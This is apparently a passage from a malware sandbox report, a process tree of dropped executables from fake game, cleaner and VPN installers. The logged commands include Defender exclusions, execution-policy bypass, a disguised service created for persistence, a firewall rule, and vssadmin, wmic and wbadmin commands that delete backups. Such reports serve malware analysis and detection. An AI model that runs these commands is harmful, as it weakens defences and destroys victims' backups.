        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\29CTUH~1.DLL
        9⤵
        
        PID:11008
        
        C:\Windows\SysWOW64\RUNDLL32.EXE
        
        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\29CTUH~1.DLL,bSBM
        9⤵
        
        PID:10588
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
        10⤵
        
        PID:7108
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        11⤵
        
        PID:9228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp8716.tmp.ps1"
        9⤵
        
        PID:5780
    - - C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
        5⤵
        
        PID:5460
      - C:\Users\Admin\AppData\Roaming\7797901.exe
        
        "C:\Users\Admin\AppData\Roaming\7797901.exe"
        6⤵
        
        PID:6224
      - C:\Users\Admin\AppData\Roaming\3087052.exe
        
        "C:\Users\Admin\AppData\Roaming\3087052.exe"
        6⤵
        
        PID:6276
      - C:\Users\Admin\AppData\Roaming\3810483.exe
        
        "C:\Users\Admin\AppData\Roaming\3810483.exe"
        6⤵
        
        PID:6200
      - C:\Users\Admin\AppData\Roaming\7937680.exe
        
        "C:\Users\Admin\AppData\Roaming\7937680.exe"
        6⤵
        
        PID:6332
      - C:\Users\Admin\AppData\Roaming\1917868.exe
        
        "C:\Users\Admin\AppData\Roaming\1917868.exe"
        6⤵
        
        PID:6368
    - - C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
        5⤵
        
        PID:5704
      - C:\Users\Admin\AppData\Local\Temp\is-3L3F1.tmp\MediaBurner2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3L3F1.tmp\MediaBurner2.tmp" /SL5="$3038E,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
        6⤵
        
        PID:6048
        
        C:\Users\Admin\AppData\Local\Temp\is-66NO3.tmp\ultradumnibour.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-66NO3.tmp\ultradumnibour.exe" /S /UID=burnerch2
        7⤵
        
        PID:1096
        
        C:\Program Files\7-Zip\ZVXKCGNUGZ\ultramediaburner.exe
        
        "C:\Program Files\7-Zip\ZVXKCGNUGZ\ultramediaburner.exe" /VERYSILENT
        8⤵
        
        PID:7944
        
        C:\Users\Admin\AppData\Local\Temp\is-ORGV7.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ORGV7.tmp\ultramediaburner.tmp" /SL5="$20370,281924,62464,C:\Program Files\7-Zip\ZVXKCGNUGZ\ultramediaburner.exe" /VERYSILENT
        9⤵
        
        PID:8164
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\0c-ac04f-a4d-5c1b8-bad387feefafa\Nubetahugi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0c-ac04f-a4d-5c1b8-bad387feefafa\Nubetahugi.exe"
        8⤵
        
        PID:8064
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 940
        9⤵
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\e3-2db58-fae-0f1bf-d083dc7a10ed0\Lyhexobisy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e3-2db58-fae-0f1bf-d083dc7a10ed0\Lyhexobisy.exe"
        8⤵
        
        PID:8080
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h1togwul.h3z\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:8872
        
        C:\Users\Admin\AppData\Local\Temp\h1togwul.h3z\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\h1togwul.h3z\GcleanerEU.exe /eufive
        10⤵
        
        PID:8372
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\h1togwul.h3z\GcleanerEU.exe" & exit
        11⤵
        
        PID:9668
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "GcleanerEU.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:9500
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tl5uknme.fam\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:8536
        
        C:\Users\Admin\AppData\Local\Temp\tl5uknme.fam\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\tl5uknme.fam\installer.exe /qn CAMPAIGN="654"
        10⤵
        
        PID:9088
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\205zoerq.ujw\anyname.exe & exit
        9⤵
        
        PID:8356
        
        C:\Users\Admin\AppData\Local\Temp\205zoerq.ujw\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\205zoerq.ujw\anyname.exe
        10⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\205zoerq.ujw\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\205zoerq.ujw\anyname.exe" -q
        11⤵
        
        PID:8784
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pd41qtlu.aok\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:9144
        
        C:\Users\Admin\AppData\Local\Temp\pd41qtlu.aok\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\pd41qtlu.aok\gcleaner.exe /mixfive
        10⤵
        
        PID:7768
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\pd41qtlu.aok\gcleaner.exe" & exit
        11⤵
        
        PID:4900
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:10196
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2bruy3hd.mgp\autosubplayer.exe /S & exit
        9⤵
        
        PID:1440
- C:\Users\Admin\Documents\PegYFqmYOCQQpBeo47YBAEF5.exe
  "C:\Users\Admin\Documents\PegYFqmYOCQQpBeo47YBAEF5.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:2008
- C:\Users\Admin\Documents\4RzU7BiBxmLwffxRvpEDiZSm.exe
  "C:\Users\Admin\Documents\4RzU7BiBxmLwffxRvpEDiZSm.exe"
  2⤵
  - Executes dropped EXE
  PID:4108
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 760
    3⤵
    - Program crash
    PID:2732
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 796
    3⤵
    - Program crash
    PID:5840
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 812
    3⤵
    - Program crash
    PID:1092
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 820
    3⤵
    - Program crash
    PID:4768
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 956
    3⤵
    - Program crash
    PID:5316
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 992
    3⤵
    - Program crash
    PID:4396
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 1048
    3⤵
    - Program crash
    PID:2968
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 1428
    3⤵
    - Program crash
    PID:4312
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 1520
    3⤵
    - Program crash
    PID:6916
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 1376
    3⤵
    - Program crash
    PID:6192
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 1712
    3⤵
    - Program crash
    PID:7588
- C:\Users\Admin\Documents\7XRd6tmNRnvpvvsD9uVr8_2e.exe
  "C:\Users\Admin\Documents\7XRd6tmNRnvpvvsD9uVr8_2e.exe"
  2⤵
  - Executes dropped EXE
  PID:2220
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 388
    3⤵
    - Program crash
    PID:4168
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 416
    3⤵
    - Program crash
    PID:5528
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 392
    3⤵
    - Program crash
    PID:5172
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 624
    3⤵
    - Program crash
    PID:2196
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 668
    3⤵
    - Program crash
    PID:5372
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 724
    3⤵
    - Program crash
    PID:6748
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 756
    3⤵
    - Program crash
    PID:6452
- - C:\Users\Admin\Documents\7XRd6tmNRnvpvvsD9uVr8_2e.exe
    "C:\Users\Admin\Documents\7XRd6tmNRnvpvvsD9uVr8_2e.exe"
    3⤵
    PID:8980

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4024
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:1892

C:\ProgramData\pvxilc\rpunosl.exe
C:\ProgramData\pvxilc\rpunosl.exe start
1⤵
PID:7328

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:7868
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding CF436CFACB079BCEBA8622763328B366 C
  2⤵
  PID:7928
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding E6B21F1EE8717B3B2068ED3C552D3EB2 C
  2⤵
  PID:7808
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 0D24949E5B54D08558CC4C8D2E12D437
  2⤵
  PID:6604
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding FB0F1BC6DDA00EA9F37168CA826092FC C
  2⤵
  PID:4240
- C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
  2⤵
  PID:10152
- - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
    3⤵
    PID:10216
  - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
      4⤵
      PID:4316
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffdf95fdec0,0x7ffdf95fded0,0x7ffdf95fdee0
        5⤵
        
        PID:9540
      - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff70e209e70,0x7ff70e209e80,0x7ff70e209e90
        6⤵
        
        PID:8944
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1804,17286873347639463133,9632765492976405492,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4316_918098551" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2556 /prefetch:1
        5⤵
        
        PID:4776
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1804,17286873347639463133,9632765492976405492,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4316_918098551" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2684 /prefetch:1
        5⤵
        
        PID:9512
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1804,17286873347639463133,9632765492976405492,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4316_918098551" --mojo-platform-channel-handle=1884 /prefetch:8
        5⤵
        
        PID:8208
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1804,17286873347639463133,9632765492976405492,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4316_918098551" --mojo-platform-channel-handle=1868 /prefetch:8
        5⤵
        
        PID:6488
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1804,17286873347639463133,9632765492976405492,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4316_918098551" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1820 /prefetch:2
        5⤵
        
        PID:10232
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1804,17286873347639463133,9632765492976405492,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4316_918098551" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3024 /prefetch:2
        5⤵
        
        PID:10460
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,17286873347639463133,9632765492976405492,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4316_918098551" --mojo-platform-channel-handle=3036 /prefetch:8
        5⤵
        
        PID:420
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,17286873347639463133,9632765492976405492,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4316_918098551" --mojo-platform-channel-handle=3028 /prefetch:8
        5⤵
        
        PID:9544
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1804,17286873347639463133,9632765492976405492,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4316_918098551" --mojo-platform-channel-handle=2860 /prefetch:8
        5⤵
        
        PID:8352
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,17286873347639463133,9632765492976405492,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4316_918098551" --mojo-platform-channel-handle=3516 /prefetch:8
        5⤵
        
        PID:3120
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,17286873347639463133,9632765492976405492,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4316_918098551" --mojo-platform-channel-handle=3356 /prefetch:8
        5⤵
        
        PID:11260
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_90D5.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
    3⤵
    PID:9312

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6236
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:7260

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4008

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8700

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:9600
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7f600fe5-cdb1-7b48-ac56-cd01c25f953f}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:9668
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
  2⤵
  PID:9960

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9676

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9948

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:10104

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:10096

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7992
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:10196

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9356

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8324
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:8236

C:\Users\Admin\AppData\Local\Temp\9A59.exe
C:\Users\Admin\AppData\Local\Temp\9A59.exe
1⤵
PID:9756

C:\Users\Admin\AppData\Local\Temp\9C2F.exe
C:\Users\Admin\AppData\Local\Temp\9C2F.exe
1⤵
PID:10176

C:\Users\Admin\AppData\Local\Temp\B49A.exe
C:\Users\Admin\AppData\Local\Temp\B49A.exe
1⤵
PID:5936

C:\Users\Admin\AppData\Local\Temp\BB71.exe
C:\Users\Admin\AppData\Local\Temp\BB71.exe
1⤵
PID:8784
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\phjyxcbi\
  2⤵
  PID:9976
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xqiecnb.exe" C:\Windows\SysWOW64\phjyxcbi\
  2⤵
  PID:1500
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create phjyxcbi binPath= "C:\Windows\SysWOW64\phjyxcbi\xqiecnb.exe /d\"C:\Users\Admin\AppData\Local\Temp\BB71.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:2968
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description phjyxcbi "wifi internet conection"
  2⤵
  PID:9272
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start phjyxcbi
  2⤵
  PID:10176
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:7088

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:10168
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:10792

C:\Users\Admin\AppData\Local\Temp\C68D.exe
C:\Users\Admin\AppData\Local\Temp\C68D.exe
1⤵
PID:9416

C:\Users\Admin\AppData\Local\Temp\D3EC.exe
C:\Users\Admin\AppData\Local\Temp\D3EC.exe
1⤵
PID:9324

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1760

C:\Users\Admin\AppData\Local\Temp\F689.exe
C:\Users\Admin\AppData\Local\Temp\F689.exe
1⤵
PID:9368

C:\Users\Admin\AppData\Local\Temp\F9F5.exe
C:\Users\Admin\AppData\Local\Temp\F9F5.exe
1⤵
PID:5700
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
  2⤵
  PID:812
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 0
    3⤵
    PID:9792
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
    3⤵
    PID:8040
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:9352
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:10860
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    PID:9444
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:6488
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:9572
- - C:\Windows\SysWOW64\cmd.exe
